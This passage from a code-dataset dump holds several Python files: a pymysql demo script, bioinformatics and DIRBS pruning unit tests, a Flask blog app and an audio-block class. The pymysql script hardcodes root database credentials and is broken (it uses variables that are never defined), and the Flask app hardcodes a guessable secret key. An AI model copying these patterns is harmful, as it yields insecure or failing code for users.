"usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 214, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 218, "usage_type": "call"}]} +{"seq_id": "237960174", "text": "# -*- coding:utf-8 -*-\n# create database dbforpymysql charset=\"utf8\";\n# create table userinfo(id int,name varchar(30),age int(10));\n# insert into userinfo(id,name,age) values (1,\"frank\",123);\nimport pymysql\n# import hashlib from sha1 #加密模块\n#连接数据库\n\ndb = pymysql.connect(host=\"192.168.3.3\",user=\"root\",passwd=\"123456\",\\\n database=\"dbforpymysql\",charset=\"utf8\",port=3306)\n#使用cursor()方法创建一个游标对象\ncursor = db.cursor()\n#使用execute()方法执行SQL语句\n# cursor.execute(\"SELECT * FROM userinfo\")\ntry: #顺序执行,出现错误则不会往下执行\n # set_id = input(\"输入id:\")\n # set_name = input(\"输入名字:\")\n sql = \"delete from userinfo where name='林乐勇'\" #汉字用单引号引起来\n cursor.execute(sql)\n print(\"delete ok\")\n # sql = \"INSERT INTO userinfo(id,name,age) VALUES(%s,%s,'123')\" #占位符%s\n sql = \"INSERT INTO userinfo(id,name,age) VALUES('123','123','123')\"\n cursor.execute(sql,[set_id,set_name]) #列表参数\n print(\"insert ok\")\n sql = \"select * from userinfo\"\n cursor.execute(sql)\n print(\"select ok\")\n db.commit()\nexcept Exception as e:\n db.rollback()\n print(\"failed\",e)\n#使用fetall()获取全部数据,fetchone()获取第一条查询数据,fetchmany(n)获取那条数据\ndata = cursor.fetchall()\ndataone = cursor.fetchone()\n#打印获取到的数据\nprint(data) #返回数据类型为元组嵌套\nprint(\"fetchont:\",dataone) #fetch的数据,取一条,少一条,类似迭代器\n#提交到数据库\n# db.rollback()\ndb.commit()\nprint('ok')\n#关闭游标和数据库的连接\ncursor.close()\ndb.close()\n#运行结果\n", "sub_path": "linux/language/python/code/mysql.py", "file_name": "mysql.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "628228067", "text": "import unittest\nimport os\nimport json\nimport gzip\nimport odybcl2fastq.odybcl2fastq as odybcl2fastq\n\nclass DemultiplexTests(unittest.TestCase):\n\n def setUp(self):\n self.sample_data_dir = (os.path.abspath( os.path.dirname( __file__ ) ) +\n '/sample_data/')\n\n def tearDown(self):\n pass\n\n def _load_json(self, path):\n obj = {}\n with open(path, 'r') as data:\n obj = json.load(data)\n return obj\n\n def test_demultiplex(self):\n cmd_path = 'tests/sample_data/cmd.json'\n cmd = self._load_json(cmd_path)\n code, demult_out, demult_err = odybcl2fastq.run_cmd(cmd)\n assert code == 0\n fastq_file = 'MDT1_SI_GA_A11_1_S1_L001_R1_001.fastq.gz'\n fastq_control_path = 'tests/sample_data/' + fastq_file\n fastq_path = '/n/ngsdata/odybcl2fastq_test/171101_D00365_1013_AHYYTWBCXY/bambahmukku/' + fastq_file\n control = gzip.open(fastq_control_path, 'r')\n test = gzip.open(fastq_path, 'r')\n for i in range(7):\n control_ln = next(control)\n test_ln = next(test)\n assert(control_ln == test_ln)\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/demultiplex_tests.py", "file_name": "demultiplex_tests.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "odybcl2fastq.odybcl2fastq.run_cmd", "line_number": 25, "usage_type": "call"}, {"api_name": "odybcl2fastq.odybcl2fastq", "line_number": 25, "usage_type": "name"}, {"api_name": "gzip.open", "line_number": 30, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "115546557", "text": "from flask import Flask, render_template\nfrom flask_login import LoginManager, login_user, login_required, logout_user, current_user\nfrom werkzeug.utils import redirect\n\n#from flask_restful import abort, Api\nfrom api import news_resource\nfrom data import db_session, api\nfrom data.news import News\nfrom data.users import User\nfrom data.comments import Comments\nfrom forms.comment import CommentForm\n\nfrom forms.register import RegisterForm\nfrom forms.login import LoginForm\n\napp = Flask(__name__)\n#api = Api(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n# для списка объектов\n#api.add_resource(news_resource.NewsListResource, '/api/v2/news')\n# для одного объекта\n#api.add_resource(news_resource.NewsResource, '/api/v2/news/')\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\n\n@app.route(\"/\")\ndef index():\n db_sess = db_session.create_session()\n news = db_sess.query(News).filter(News.is_private != True)\n return render_template(\"index.html\", news=news, title=\"Записи в блоге\")\n\n@app.route(\"/news\")\ndef news():\n db_sess = db_session.create_session()\n data = db_sess.query(News)\n return render_template(\"news.html\", news=data, title=\"Новости\")\n\n@app.route(\"/news/\", methods=['GET', 'POST'])\ndef news_item(id):\n db_sess = db_session.create_session()\n if current_user.is_authenticated:\n form = CommentForm()\n if form.validate_on_submit():\n comm = Comments()\n comm.connected_to_id = id\n comm.table_name = News.__tablename__\n comm.author_id = current_user.id\n comm.text = form.text.data\n db_sess.add(comm)\n db_sess.commit()\n else:\n form = None\n\n data = db_sess.query(News).get(id)\n comments = db_sess.query(Comments).filter(Comments.connected_to_id == id,\n Comments.table_name == News.__tablename__)\n\n return render_template(\"news_item.html\", news=data, title=data.title, comments=comments, form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef reqister():\n form = RegisterForm()\n if form.validate_on_submit():\n if form.password.data != form.password_again.data:\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Пароли не совпадают\")\n db_sess = db_session.create_session()\n if db_sess.query(User).filter(User.email == form.email.data).first():\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Такой пользователь уже есть\")\n user = User(\n name=form.name.data,\n email=form.email.data,\n about=form.about.data\n )\n user.set_password(form.password.data)\n db_sess.add(user)\n db_sess.commit()\n return redirect('/')\n return render_template('register.html', title='Регистрация', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n db_sess = db_session.create_session()\n user = db_sess.query(User).filter(User.email == form.email.data).first()\n if user and user.check_password(form.password.data):\n login_user(user, remember=form.remember_me.data)\n return redirect(\"/\")\n return render_template('login.html',\n message=\"Неправильный логин или пароль\",\n form=form)\n return render_template('login.html', title='Авторизация', form=form)\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\ndef abort_if_news_not_found(news_id):\n session = db_session.create_session()\n news = session.query(News).get(news_id)\n if not news:\n abort(404, message=f\"News {news_id} not found\")\n\n\nfrom flask import make_response,jsonify\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\ndef main():\n db_session.global_init(\"db/website.sqlite\")\n\n db_sess = db_session.create_session()\n db_sess.add(News('Test', 'Text', '', 1))\n db_sess.commit()\n for user in db_sess.query(User).all():\n print(user)\n users = db_sess.query(User).filter(User.about.contains('пользоват'), User.id != 1, User.id % 2 != 0).all()\n\n for user in users:\n print(user)\n\n #app.register_blueprint(api.blueprint)\n app.run()\n\nif __name__ == '__main__':\n\n main()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 19, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 29, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 29, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 30, "usage_type": "argument"}, {"api_name": "data.db_session.create_session", "line_number": 36, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 36, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 37, "usage_type": "argument"}, {"api_name": "data.news.News.is_private", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 42, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 42, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 43, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 48, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 49, "usage_type": "name"}, {"api_name": "forms.comment.CommentForm", "line_number": 50, "usage_type": "call"}, {"api_name": "data.comments.Comments", "line_number": 52, "usage_type": "call"}, {"api_name": "data.news.News.__tablename__", "line_number": 54, "usage_type": "attribute"}, {"api_name": "data.news.News", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_login.current_user.id", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 55, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 62, "usage_type": "argument"}, {"api_name": "data.comments.Comments", "line_number": 63, "usage_type": "argument"}, {"api_name": "data.comments.Comments.connected_to_id", "line_number": 63, "usage_type": "attribute"}, {"api_name": "data.comments.Comments.table_name", "line_number": 64, "usage_type": "attribute"}, {"api_name": "data.comments.Comments", "line_number": 64, "usage_type": "name"}, {"api_name": "data.news.News.__tablename__", "line_number": 64, "usage_type": "attribute"}, {"api_name": "data.news.News", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "data.title", "line_number": 66, "usage_type": "attribute"}, {"api_name": "forms.register.RegisterForm", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 76, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 76, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 77, "usage_type": "argument"}, {"api_name": "data.users.User.email", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 81, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 90, "usage_type": "call"}, {"api_name": "forms.login.LoginForm", "line_number": 95, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 97, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 97, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 98, "usage_type": "argument"}, {"api_name": "data.users.User.email", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 100, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 105, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 110, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 108, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 114, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 114, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 115, "usage_type": "argument"}, {"api_name": "flask.make_response", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 124, "usage_type": "call"}, {"api_name": "data.db_session.global_init", "line_number": 127, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 127, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 129, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 129, "usage_type": "name"}, {"api_name": "data.news.News", "line_number": 130, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 132, "usage_type": "argument"}, {"api_name": "data.users.User", "line_number": 134, "usage_type": "argument"}, {"api_name": "data.users.User.about.contains", "line_number": 134, "usage_type": "call"}, {"api_name": "data.users.User.about", "line_number": 134, "usage_type": "attribute"}, {"api_name": "data.users.User.id", "line_number": 134, "usage_type": "attribute"}]} +{"seq_id": "304476420", "text": "import numpy\nfrom audio_block import AudioBlock\nfrom ..commons import AudioMessage\nimport moviepy.editor as movie_editor\nimport scipy.io.wavfile\n\nclass AudioSamplesBlock(AudioBlock):\n TYPE_NAME = \"samples\"\n\n def __init__(self, samples):\n super(AudioSamplesBlock, self).__init__()\n self.samples = samples\n self.set_sample_count(samples.shape[0])\n self.inclusive_duration = self.duration\n\n def copy(self):\n if self.instru:\n newob = self.instru.create_note_block(self.music_note)\n else:\n newob = type(self)(self.samples.copy())\n self.copy_values_into(newob)\n return newob\n\n @classmethod\n def create_from_xml(cls, elm, instru):\n music_note = elm.get(\"note\")\n newob = instru.create_note_block(music_note)\n newob.load_from_xml(elm)\n return newob\n\n def readjust(self):\n if self.auto_fit_duration:\n self.set_sample_count(self.samples.shape[0])\n self.inclusive_duration = self.samples.shape[0]\n\n def set_samples(self, samples):\n self.samples = samples\n self.readjust()\n\n def get_samples(self, frame_count, start_from=None, use_loop=True, loop=None):\n if self.paused:\n return None\n if start_from is None:\n start_pos = self.current_pos\n else:\n start_pos = start_from\n\n if loop is None or self.loop == self.LOOP_NEVER_EVER:\n loop = self.loop\n\n audio_message = AudioMessage()\n data = None\n\n if loop and loop != self.LOOP_NEVER_EVER and use_loop:\n spread = frame_count\n start_init_pos = start_pos\n elapsed_pos = 0\n while data is None or data.shape[0]=self.duration:\n break\n read_pos = start_pos%self.samples.shape[0]\n else:\n start_pos %= self.duration\n read_pos = start_pos\n\n if read_pos=self.duration:\n data = numpy.zeros((0, AudioBlock.ChannelCount), dtype=numpy.float32)\n else:\n data = self.samples[start_pos: start_pos+frame_count, :]\n start_pos += data.shape[0]\n if self.midi_channel is not None and start_pos >= self.duration:# and data.shape[0]>0:\n audio_message.midi_messages.append(self.new_midi_note_off_message(data.shape[0]))\n if start_from is None:\n self.lock.acquire()\n self.current_pos = start_pos\n self.lock.release()\n if self.live_once and self.current_pos >= self.duration:\n self.destroy()\n\n if data.shape[0]\", view_func=views.task_page)\n app.add_url_rule(\n \"/new-task\", view_func=views.task_add_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/tasks//edit\", view_func=views.task_edit_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists\", view_func=views.lists_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists/\", view_func=views.list_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/new-list\", view_func=views.list_add_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//edit\", view_func=views.list_edit_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//new-task\", view_func=views.list_new_task_page, methods=[\"GET\", \"POST\"]\n )\n app.add_url_rule(\n \"/lists//add-task\", view_func=views.list_add_task_page, methods=[\"GET\", \"POST\"]\n )\n\n lm.init_app(app)\n lm.login_view = \"login_page\"\n\n dbinit.run(app.config[\"DATABASE_URL\"])\n db = Database(app.config[\"DATABASE_URL\"])\n app.config[\"db\"] = db\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n port = app.config.get(\"PORT\", 5000)\n app.run(host=\"0.0.0.0\", port=port)\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_login.LoginManager", "line_number": 8, "usage_type": "call"}, {"api_name": "user.get_user", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "views.home_page", "line_number": 23, "usage_type": "attribute"}, {"api_name": "views.login_page", "line_number": 25, "usage_type": "attribute"}, {"api_name": "views.logout_page", "line_number": 27, "usage_type": "attribute"}, {"api_name": "views.signup_page", "line_number": 29, "usage_type": "attribute"}, {"api_name": "views.tasks_page", "line_number": 32, "usage_type": "attribute"}, {"api_name": "views.task_page", "line_number": 34, "usage_type": "attribute"}, {"api_name": "views.task_add_page", "line_number": 36, "usage_type": "attribute"}, {"api_name": "views.task_edit_page", "line_number": 39, "usage_type": "attribute"}, {"api_name": "views.lists_page", "line_number": 42, "usage_type": "attribute"}, {"api_name": "views.list_page", "line_number": 45, "usage_type": "attribute"}, {"api_name": "views.list_add_page", "line_number": 48, "usage_type": "attribute"}, {"api_name": "views.list_edit_page", "line_number": 51, "usage_type": "attribute"}, {"api_name": "views.list_new_task_page", "line_number": 54, "usage_type": "attribute"}, {"api_name": "views.list_add_task_page", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dbinit.run", "line_number": 63, "usage_type": "call"}, {"api_name": "database.Database", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "588562614", "text": "\"\"\"\nData pruning unit tests.\n\nCopyright (c) 2018 Qualcomm Technologies, Inc.\n\n All rights reserved.\n\n\n\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the\n limitations in the disclaimer below) provided that the following conditions are met:\n\n\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided with the distribution.\n\n * Neither the name of Qualcomm Technologies, Inc. nor the names of its contributors may be used to endorse or promote\n products derived from this software without specific prior written permission.\n\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY\n THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport datetime\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom dirbs.cli.prune import cli as dirbs_prune_cli\nfrom dirbs.cli.classify import cli as dirbs_classify_cli\nfrom dirbs.importer.gsma_data_importer import GSMADataImporter\nfrom _fixtures import * # noqa: F403, F401\nfrom _helpers import get_importer, expect_success, from_cond_dict_list_to_cond_list\nfrom _importer_params import OperatorDataParams, StolenListParams, GSMADataParams\n\n\n@pytest.mark.parametrize('operator_data_importer',\n [OperatorDataParams(\n filename='testData1-operator-operator4-anonymized_20161101_20161130.csv',\n operator='1',\n extract=False,\n perform_leading_zero_check=False,\n mcc_mnc_pairs=[{'mcc': '111', 'mnc': '04'}],\n perform_unclean_checks=False,\n perform_file_daterange_check=False)],\n indirect=True)\ndef test_persistent_network_imeis(postgres, db_conn, tmpdir, logger, operator_data_importer, mocked_config):\n \"\"\"Test Depot ID 96759/1.\n\n Verify DIRBS core instance maintain a persistent list of all IMEIs that\n have ever been seen in operator data. Verify the all-time seen IMEI list does not contain\n subscriber information. Verify the all-time seen IMEI list is not be impacted when operator data is pruned.\n Verify the all-time seen IMEI list record the date that the IMEI first appeared on a per-operator basis.\n \"\"\"\n operator_data_importer.import_data()\n\n # compare the results before and after pruning\n with db_conn.cursor() as cur:\n cur.execute('SELECT imei_norm, first_seen '\n 'FROM network_imeis ORDER BY imei_norm ASC')\n result_list_before_prune = [(res.imei_norm, res.first_seen.strftime('%Y%m%d'))\n for res in cur.fetchall()]\n\n runner = CliRunner()\n result = runner.invoke(dirbs_prune_cli, ['triplets'], obj={'APP_CONFIG': mocked_config})\n assert result.exit_code == 0\n\n with db_conn.cursor() as cur:\n cur.execute('SELECT imei_norm, first_seen '\n 'FROM network_imeis ORDER BY imei_norm ASC')\n\n result_list_after_prune = [(res.imei_norm, res.first_seen.strftime('%Y%m%d'))\n for res in cur.fetchall()]\n\n assert result_list_after_prune == [('01376803870943', '20161107'), ('21123131308878', '20161110'),\n ('21123131308879', '20161111'), ('21260934121733', '20161106'),\n ('21260934475212', '20161130'), ('21782434077450', '20161124'),\n ('21782434077459', '20161118'), ('38245933AF987001', '20161109'),\n ('38709433212541', '20161113'), ('38847733370026', '20161104'),\n ('64220297727231', '20161112'), ('64220299727231', '20161112')]\n\n assert result_list_before_prune == result_list_after_prune\n\n\n@pytest.mark.parametrize('operator_data_importer',\n [OperatorDataParams(\n content='date,imei,imsi,msisdn\\n'\n '20110101,8888#888622222,123456789012345,123456789012345\\n'\n '20110101,88888888622222,123456789012345,123456789012345\\n'\n '20110101,21111111111111,125456789012345,123456789012345\\n'\n '20110101,21111111111112,125456789012345,123456789012345\\n'\n '20110101,88888862222209,123456789012345,123456789012345',\n extract=False,\n perform_unclean_checks=False,\n perform_region_checks=False,\n perform_home_network_check=False,\n operator='operator1'\n )],\n indirect=True)\n@pytest.mark.parametrize('gsma_tac_db_importer',\n [GSMADataParams(filename='gsma_dump_emptynontac_july_2016.txt')],\n indirect=True)\n@pytest.mark.parametrize('stolen_list_importer',\n [StolenListParams(filename='testData1-sample_stolen_list-anonymized.csv')],\n indirect=True)\ndef test_prune_classification_state(db_conn, metadata_db_conn, tmpdir, logger, mocked_config,\n operator_data_importer, stolen_list_importer, monkeypatch,\n gsma_tac_db_importer, postgres, mocked_statsd):\n \"\"\"Test Depot ID not known yet.\n\n A regulator/partner should be able to run a CLI command to prune classification_state table.\n It will remove any classification state data related to obsolete conditions and\n data with end_date is earlier than the start of the retention window.\n \"\"\"\n # Step 1:\n # import gsma_dump empty non tac and classify for all the conditions\n # ['gsma_not_found', 'local_stolen', 'duplicate_mk1', 'malformed_imei', 'not_on_registration_list', ..]\n # classification_state_table contains records for cond_name \"gsma_not_found\". They all have end_date==None\n\n # Step 2 - TEST RETENTION WINDOW:\n # CLI prune will delete rows where the end_date is earlier than the start of the retention window.\n # retention_months=6\n # curr_date = datetime.date(2017, 7, 13)\n # Import different gsma_db and classify to have different end date for gsma_not_found records in\n # the classification table.\n\n # Step 3 - TEST CONDITIONS NOT EXISTING:\n # CLI prune for classification_state will look at the current configured conditions and\n # remove any entries corresponding to cond_names that no longer exist in the config.\n # Load a new yaml file without stolen_list condition and run the prune CLI command to test.\n # -- yaml cond config list:\n # ['gsma_not_found', 'malformed_imei', 'not_on_registration_list']\n # -- classification_state condition list:\n # ['gsma_not_found', 'local_stolen', 'malformed_imei', 'not_on_registration_list']\n\n # Step 1\n operator_data_importer.import_data()\n stolen_list_importer.import_data()\n gsma_tac_db_importer.import_data()\n\n runner = CliRunner()\n db_conn.commit()\n runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20170713'],\n obj={'APP_CONFIG': mocked_config})\n\n with db_conn.cursor() as cur:\n cur.execute('SELECT imei_norm, cond_name, end_date FROM classification_state ORDER BY cond_name, imei_norm')\n res_list = cur.fetchall()\n assert len(res_list) == 32\n assert [(x.imei_norm, x.cond_name, x.end_date) for x in res_list] == \\\n [('21111111111111', 'gsma_not_found', None),\n ('21111111111112', 'gsma_not_found', None),\n ('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', None),\n ('12432807272315', 'local_stolen', None),\n ('12640904324427', 'local_stolen', None),\n ('12640904372723', 'local_stolen', None),\n ('12727231272313', 'local_stolen', None),\n ('12875502464321', 'local_stolen', None),\n ('12875502572723', 'local_stolen', None),\n ('12875507272312', 'local_stolen', None),\n ('12904502843271', 'local_stolen', None),\n ('12909602432585', 'local_stolen', None),\n ('12909602872723', 'local_stolen', None),\n ('12922902206948', 'local_stolen', None),\n ('12922902243260', 'local_stolen', None),\n ('12922902432742', 'local_stolen', None),\n ('12922902432776', 'local_stolen', None),\n ('12957272313271', 'local_stolen', None),\n ('17272317272723', 'local_stolen', None),\n ('56773605727231', 'local_stolen', None),\n ('64220204327947', 'local_stolen', None),\n ('64220297727231', 'local_stolen', None),\n ('72723147267231', 'local_stolen', None),\n ('72723147267631', 'local_stolen', None),\n ('8888#888622222', 'malformed_imei', None),\n ('21111111111111', 'not_on_registration_list', None),\n ('21111111111112', 'not_on_registration_list', None),\n ('8888#888622222', 'not_on_registration_list', None),\n ('88888862222209', 'not_on_registration_list', None),\n ('88888888622222', 'not_on_registration_list', None)]\n\n # Step 2\n # all records have end_date == None. Classify twice to have records with different end_date\n # first classification\n with get_importer(GSMADataImporter,\n db_conn,\n metadata_db_conn,\n mocked_config.db_config,\n tmpdir,\n logger,\n mocked_statsd,\n GSMADataParams(filename='gsma_not_found_anonymized.txt')) as imp:\n expect_success(imp, 1, db_conn, logger)\n\n runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20170713'],\n obj={'APP_CONFIG': mocked_config})\n\n # with db_conn.cursor() as cur:\n cur.execute(\"\"\"SELECT imei_norm, cond_name, end_date\n FROM classification_state\n ORDER BY cond_name, imei_norm\"\"\")\n res_list = cur.fetchall()\n\n gsma_not_found_list = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list\n if x.cond_name == 'gsma_not_found']\n\n assert gsma_not_found_list == [('21111111111111', 'gsma_not_found', None),\n ('21111111111112', 'gsma_not_found', None),\n ('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13))]\n # second classification\n with get_importer(GSMADataImporter,\n db_conn,\n metadata_db_conn,\n mocked_config.db_config,\n tmpdir,\n logger,\n mocked_statsd,\n GSMADataParams(filename='prune_classification_state_gsma.txt')) as imp:\n expect_success(imp, 1, db_conn, logger)\n\n runner.invoke(dirbs_classify_cli, ['--no-safety-check', '--curr-date', '20160101'],\n obj={'APP_CONFIG': mocked_config})\n\n # with db_conn.cursor() as cur:\n cur.execute('SELECT imei_norm, cond_name, end_date '\n ' FROM classification_state '\n 'ORDER BY cond_name, imei_norm, end_date')\n res_list = cur.fetchall()\n\n gsma_not_found_list = [(x.imei_norm, x.cond_name, x.end_date) for x in res_list if\n x.cond_name == 'gsma_not_found']\n\n assert gsma_not_found_list == [('21111111111111', 'gsma_not_found', datetime.date(2016, 1, 1)),\n ('21111111111112', 'gsma_not_found', datetime.date(2016, 1, 1)),\n ('8888#888622222', 'gsma_not_found', None),\n ('88888862222209', 'gsma_not_found', None),\n ('88888888622222', 'gsma_not_found', datetime.date(2017, 7, 13)),\n ('88888888622222', 'gsma_not_found', None)]\n\n # Step 3\n # Expect not to be in classification_state table after prune:\n # IMEIs 21111111111111 and 21111111111112 for condition gsma_not found (due to end_date)\n # IMEIs for condition stolen_list (due to condition no longer exist)\n\n # this commit is to remove locks from the classification_state table so that\n # the table can be dropped inside the prune. The locks were activated by the CLI to classify.\n db_conn.commit()\n\n cond_dict_list = [{'label': 'gsma_not_found',\n 'reason': 'TAC not found in GSMA TAC database',\n 'grace_period_days': 30,\n 'blocking': True,\n 'dimensions': [{'module': 'gsma_not_found'}]\n },\n {'label': 'malformed_imei',\n 'reason': 'Invalid characters detected in IMEI',\n 'grace_period_days': 0,\n 'blocking': False,\n 'dimensions': [{'module': 'malformed_imei'}]\n },\n {'label': 'not_on_registration_list',\n 'reason': 'IMEI not found on local registration list',\n 'grace_period_days': 0,\n 'blocking': True,\n 'max_allowed_matching_ratio': 1.0,\n 'dimensions': [{'module': 'not_on_registration_list'}]\n }]\n\n monkeypatch.setattr(mocked_config, 'conditions', 